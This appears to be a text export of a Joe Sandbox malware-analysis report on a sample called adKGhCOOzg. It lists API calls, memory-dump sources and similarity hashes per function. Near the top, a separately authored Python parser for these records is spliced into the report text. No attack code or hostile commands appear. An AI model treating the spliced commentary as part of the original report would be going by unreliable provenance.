                                    • GetWindow.USER32(00000000,00000002), ref: 0034DD47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                    • String ID: I=u$$%s:$CAPTION$T7$d
                                    • API String ID: 2407758923-2040545954
                                    • Opcode ID: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
                                    • Instruction ID: 1736d04ad78ea3352474d221a02abb2ab2a40897eb26614b1e7432d6e687d0ca
                                    • Opcode Fuzzy Hash: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
                                    • Instruction Fuzzy Hash: 7281B071508301AFD712DF68CC89E6BBBE9EB89704F05491DFA8497250D670E809CB52
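The records above are what the Joe Sandbox IDA plugin emits per function: the API references (direct calls and calls reached through subcalls, each with its return address), the `$`-joined API and String IDs, and the Opcode ID / Instruction Fuzzy Hash pair used for similarity. To pivot on them outside the web UI (dedupe functions by Opcode ID, find every function that reaches a given API, count which modules a function touches) the text has to be parsed first. The parser below is an added example and is not part of this report or of Joe Sandbox's own tooling; its input is two records copied (abridged) from this page, the field names such as `api_id` and `subcall_of` and the helper names are my own, and it also strips the "Download File" link text that the report's text export fuses onto the memory-dump names.

```python
import re
from collections import Counter

# Constructed input: two records copied (abridged) from the report text above. The
# "Download File" suffix on the Associated line is extraction residue the report carries.
SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID:
• Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
• Instruction Fuzzy Hash: 4231F2B1A447458FCB25DF28C85166ABBE0FB95301F10492DE8E5CB742C739EA4DCB92
APIs
• _swprintf.LIBCMT ref: 0034DABE
  • Part of subcall function 00351596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00380EE8,00000200,0034D202,00000000,?,00000050,00380EE8), ref: 003515B3
• SetDlgItemTextW.USER32(?,0037E154,?), ref: 0034DB3F
• GetWindowRect.USER32(?,?), ref: 0034DB79
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: I=u$$%s:$CAPTION$T7$d
• API String ID: 2407758923-2040545954
• Opcode ID: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
• Instruction ID: 1736d04ad78ea3352474d221a02abb2ab2a40897eb26614b1e7432d6e687d0ca
• Opcode Fuzzy Hash: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
• Instruction Fuzzy Hash: 7281B071508301AFD712DF68CC89E6BBBE9EB89704F05491DFA8497250D670E809CB52
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SIM_KEYS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
            "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
            "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>[A-Za-z_]\w*)"
                    r"\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

def _clean(raw):
    """Drop indentation, the bullet glyph and the fused 'Download File' link text."""
    line = raw.strip().lstrip("•").strip()
    return line[:-len("Download File")] if line.endswith("Download File") else line

def _finish(rec):
    # Joe joins list members with "$"; a member that itself contains "$" is ambiguous
    # ("I=u$$" in the sample), so empty fragments are dropped rather than guessed at.
    for k in ("api_id", "string_id"):
        rec[k] = [s for s in rec.get(k, "").split("$") if s]
    return rec

def parse_records(text):
    """One dict per function record; a record ends at its Instruction Fuzzy Hash line."""
    new = lambda: {"apis": [], "subcalls": [], "strings": [], "associated": [], "offset": ""}
    records, rec, section = [], new(), None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTIONS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                call = {"name": m["name"], "module": m["module"], "ref": m["ref"], "args": m["args"] or ""}
                if m["sub"]:
                    call["subcall_of"] = m["sub"]
                    rec["subcalls"].append(call)
                else:
                    rec["apis"].append(call)
        elif section == "Strings":
            rec["strings"].append(line)
        else:                                   # "Key: value" fields of the other sections
            key, _, val = (s.strip() for s in line.partition(":"))
            if key == "Associated":
                rec["associated"].append(val)
            elif key == "Source File":
                rec["source_file"] = val.split(",")[0]
                off = re.search(r"Offset: ([0-9A-Fa-f]+)", val)
                rec["offset"] = off.group(1) if off else ""
            else:
                rec[SIM_KEYS.get(key, key)] = val
                if key == "Instruction Fuzzy Hash":   # last field of every record
                    records.append(_finish(rec))
                    rec, section = new(), None
    return records

def imports_by_module(records):
    """Count the modules hit by direct (non-subcall) API references across records."""
    return Counter(c["module"] for r in records for c in r["apis"])

def functions_calling(records, api_name):
    """Opcode IDs of every function that reaches api_name directly or through a subcall."""
    return [r["opcode_id"] for r in records
            if any(c["name"] == api_name for c in r["apis"] + r["subcalls"])]
```

Opcode ID is the field to key on when comparing functions between reports of different samples; the Instruction Fuzzy Hash comparison itself is Joe Sandbox's own and is not reimplemented here. The `args` string is kept verbatim because the `?` placeholders for unresolved arguments carry no further structure, and the `$`-joined ID lists are split conservatively, since a member containing a literal `$` cannot be told apart from a separator.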
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0036C277
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE2F
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE41
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE53
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE65
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE77
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE89
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE9B
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEAD
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEBF
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BED1
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEE3
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEF5
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BF07
                                    • _free.LIBCMT ref: 0036C26C
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036C28E
                                    • _free.LIBCMT ref: 0036C2A3
                                    • _free.LIBCMT ref: 0036C2AE
                                    • _free.LIBCMT ref: 0036C2D0
                                    • _free.LIBCMT ref: 0036C2E3
                                    • _free.LIBCMT ref: 0036C2F1
                                    • _free.LIBCMT ref: 0036C2FC
                                    • _free.LIBCMT ref: 0036C334
                                    • _free.LIBCMT ref: 0036C33B
                                    • _free.LIBCMT ref: 0036C358
                                    • _free.LIBCMT ref: 0036C370
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID: P7
                                    • API String ID: 161543041-1475978607
                                    • Opcode ID: 7b33ed955850d49cc1102e3c03015fbf3a96edb013d59ec2799dd36cf0217c48
                                    • Instruction ID: 402da6e4da00198c5ae0788150ef2b9afb0ee4569eba925b718c3c8e2c8fffef
                                    • Opcode Fuzzy Hash: 7b33ed955850d49cc1102e3c03015fbf3a96edb013d59ec2799dd36cf0217c48
                                    • Instruction Fuzzy Hash: 193190316002059FEB239B79D985B66B3E9FF04314F22D929E488DB659DF75EC40CB60
                                    APIs
                                    • GetWindow.USER32(?,00000005), ref: 0035CD51
                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0035CD7D
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0035CD99
                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0035CDB0
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0035CDC4
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0035CDED
                                    • DeleteObject.GDI32(00000000), ref: 0035CDF4
                                    • GetWindow.USER32(00000000,00000002), ref: 0035CDFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                    • String ID: STATIC
                                    • API String ID: 3820355801-1882779555
                                    • Opcode ID: 697d1e391bf7d20c47084674ab156ce1448353336678434420f4d42ec6be12d5
                                    • Instruction ID: 4b99fcbd2e8f4e716874b8113897eac5fc34f4a927f5c7b2ea5a410fa22ae210
                                    • Opcode Fuzzy Hash: 697d1e391bf7d20c47084674ab156ce1448353336678434420f4d42ec6be12d5
                                    • Instruction Fuzzy Hash: 3A110A32540310BFE233AB64DC0AF9F76ACEF56743F014421FE42E50B2CA64890D96A4
                                    APIs
                                    • _free.LIBCMT ref: 00368EC5
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 00368ED1
                                    • _free.LIBCMT ref: 00368EDC
                                    • _free.LIBCMT ref: 00368EE7
                                    • _free.LIBCMT ref: 00368EF2
                                    • _free.LIBCMT ref: 00368EFD
                                    • _free.LIBCMT ref: 00368F08
                                    • _free.LIBCMT ref: 00368F13
                                    • _free.LIBCMT ref: 00368F1E
                                    • _free.LIBCMT ref: 00368F2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 526cff7cb412213af73142ec424b81c26b5bb69b5a85842750a1a4c69f66a933
                                    • Instruction ID: 133b9572c0995ce1bb8644bea260b43d08d5cec0b839ce2464ede3d9b810ce25
                                    • Opcode Fuzzy Hash: 526cff7cb412213af73142ec424b81c26b5bb69b5a85842750a1a4c69f66a933
                                    • Instruction Fuzzy Hash: 7F11A47650010DAFCB13EF55C882CDE7BA5FF08354B5282A5BA088F62ADE31DA519B80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;%u$x%u$xc%u
                                    • API String ID: 0-2277559157
                                    • Opcode ID: 07e954eedf6f09497a4be65d48764b4549d213a8bab2c7d68ddba4c7a6bb7883
                                    • Instruction ID: 6ecfdf1fbcaf6c2d4263c2ef8b77f2363b41fe030ba20aac282789a9fbfbc7db
                                    • Opcode Fuzzy Hash: 07e954eedf6f09497a4be65d48764b4549d213a8bab2c7d68ddba4c7a6bb7883
                                    • Instruction Fuzzy Hash: DEF1F5716042405BDB17EF248895BFF7BD9AF91300F494469F885AF287DA68B848C7A2
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035AD20
                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0035AD47
                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0035AD60
                                    • SetWindowTextW.USER32(?,?), ref: 0035AD71
                                    • GetDlgItem.USER32(?,00000065), ref: 0035AD7A
                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0035AD8E
                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0035ADA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                    • String ID: LICENSEDLG
                                    • API String ID: 3214253823-2177901306
                                    • Opcode ID: db92ea72387f8d7b90e106a7912b5043ef6a8e561cee1fd5ba470b27151b7ee6
                                    • Instruction ID: 09d7dd890ce61632b8759e045bac6cbdc17d99aec1f3b244b750f7d40b0219d0
                                    • Opcode Fuzzy Hash: db92ea72387f8d7b90e106a7912b5043ef6a8e561cee1fd5ba470b27151b7ee6
                                    • Instruction Fuzzy Hash: 1321A632240605BBD223AF65ED49E3B3BBCEB47747F020115FA45968B0DB625D05E732
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00349448
                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0034946B
                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0034948A
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • _swprintf.LIBCMT ref: 00349526
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • MoveFileW.KERNEL32(?,?), ref: 00349595
                                    • MoveFileW.KERNEL32(?,?), ref: 003495D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                    • String ID: rtmp%d
                                    • API String ID: 2111052971-3303766350
                                    • Opcode ID: 9ee10de984d9b625d34680529d1bc225ce41cadfa82a2079417f2266fa37d5bb
                                    • Instruction ID: 68e209566217891810f5d4000080f1ca605347a18165c493e388c227ca456bee
                                    • Opcode Fuzzy Hash: 9ee10de984d9b625d34680529d1bc225ce41cadfa82a2079417f2266fa37d5bb
                                    • Instruction Fuzzy Hash: 2241747190015866CF32EB608C85FDB73BCAF15390F0544E6B549EB052EB38AB88CB60
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00358F38
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00358F59
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00358F80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                    • API String ID: 4094277203-4209811716
                                    • Opcode ID: e0dda7593c845fef5c84313b3bccbded0eb841467937ed50e1890501f3924e65
                                    • Instruction ID: 91a4cf21c589f9fddc4359418c7f1624a75a6fd50b1bb73c18f0890cd9893e24
                                    • Opcode Fuzzy Hash: e0dda7593c845fef5c84313b3bccbded0eb841467937ed50e1890501f3924e65
                                    • Instruction Fuzzy Hash: 5C312831508311BBD723BB24AC06FAB77ACDF46721F00451AFD06AB1E1EF649A0D83A1
                                    APIs
                                    • GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                    • _free.LIBCMT ref: 00368FDC
                                    • _free.LIBCMT ref: 00369004
                                    • SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 00369011
                                    • SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                    • _abort.LIBCMT ref: 00369023
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID: X7
                                    • API String ID: 3160817290-1737092782
                                    • Opcode ID: 56f13a773d7501effd60042e9c798700099b75b92625a3adb4497dc8e6462e40
                                    • Instruction ID: 563f329798de678043686c3b65411e32c14210952fb91feff59497d81249c1ee
                                    • Opcode Fuzzy Hash: 56f13a773d7501effd60042e9c798700099b75b92625a3adb4497dc8e6462e40
                                    • Instruction Fuzzy Hash: 1DF02835504A106AC63333687C4AB6B2D2E9FC9760F26C215F51AEA29EEE20CD416021
                                    APIs
                                    • __aulldiv.LIBCMT ref: 00350A9D
                                      • Part of subcall function 0034ACF5: GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00350AC0
                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00350AD2
                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00350AE3
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350AF3
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350B03
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00350B3D
                                    • __aullrem.LIBCMT ref: 00350BCB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                    • String ID:
                                    • API String ID: 1247370737-0
                                    • Opcode ID: d91e605ad8e91ac8773c352f3796f9a6b69b8e1c3acea0fb7d7186f5c4b72240
                                    • Instruction ID: 9397618b166537b7fce18d286e98eb72d9fa566e45f122c5aeefe6e53614aea9
                                    • Opcode Fuzzy Hash: d91e605ad8e91ac8773c352f3796f9a6b69b8e1c3acea0fb7d7186f5c4b72240
                                    • Instruction Fuzzy Hash: 624129B14083069FC315DF65C8809ABFBF8FB88715F004E2EF99692650E739E548DB52
                                    APIs
                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0036F5A2,?,00000000,?,00000000,00000000), ref: 0036EE6F
                                    • __fassign.LIBCMT ref: 0036EEEA
                                    • __fassign.LIBCMT ref: 0036EF05
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0036EF2B
                                    • WriteFile.KERNEL32(?,?,00000000,0036F5A2,00000000,?,?,?,?,?,?,?,?,?,0036F5A2,?), ref: 0036EF4A
                                    • WriteFile.KERNEL32(?,?,00000001,0036F5A2,00000000,?,?,?,?,?,?,?,?,?,0036F5A2,?), ref: 0036EF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: b943286e5ae73357425b5611b7941e8d212928ba9681e0f4183ca6af2e7bcc63
                                    • Instruction ID: 07bd3c202d1cc6f66702ab98558659d13683c321d558c4824be959620966cacc
                                    • Opcode Fuzzy Hash: b943286e5ae73357425b5611b7941e8d212928ba9681e0f4183ca6af2e7bcc63
                                    • Instruction Fuzzy Hash: B951F674A002089FCB12CFA8DC41AEEBBF9FF09700F15851AE955EB291D730D944CB60
                                    APIs
                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0035C54A
                                    • _swprintf.LIBCMT ref: 0035C57E
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • SetDlgItemTextW.USER32(?,00000066,0038946A), ref: 0035C59E
                                    • _wcschr.LIBVCRUNTIME ref: 0035C5D1
                                    • EndDialog.USER32(?,00000001), ref: 0035C6B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
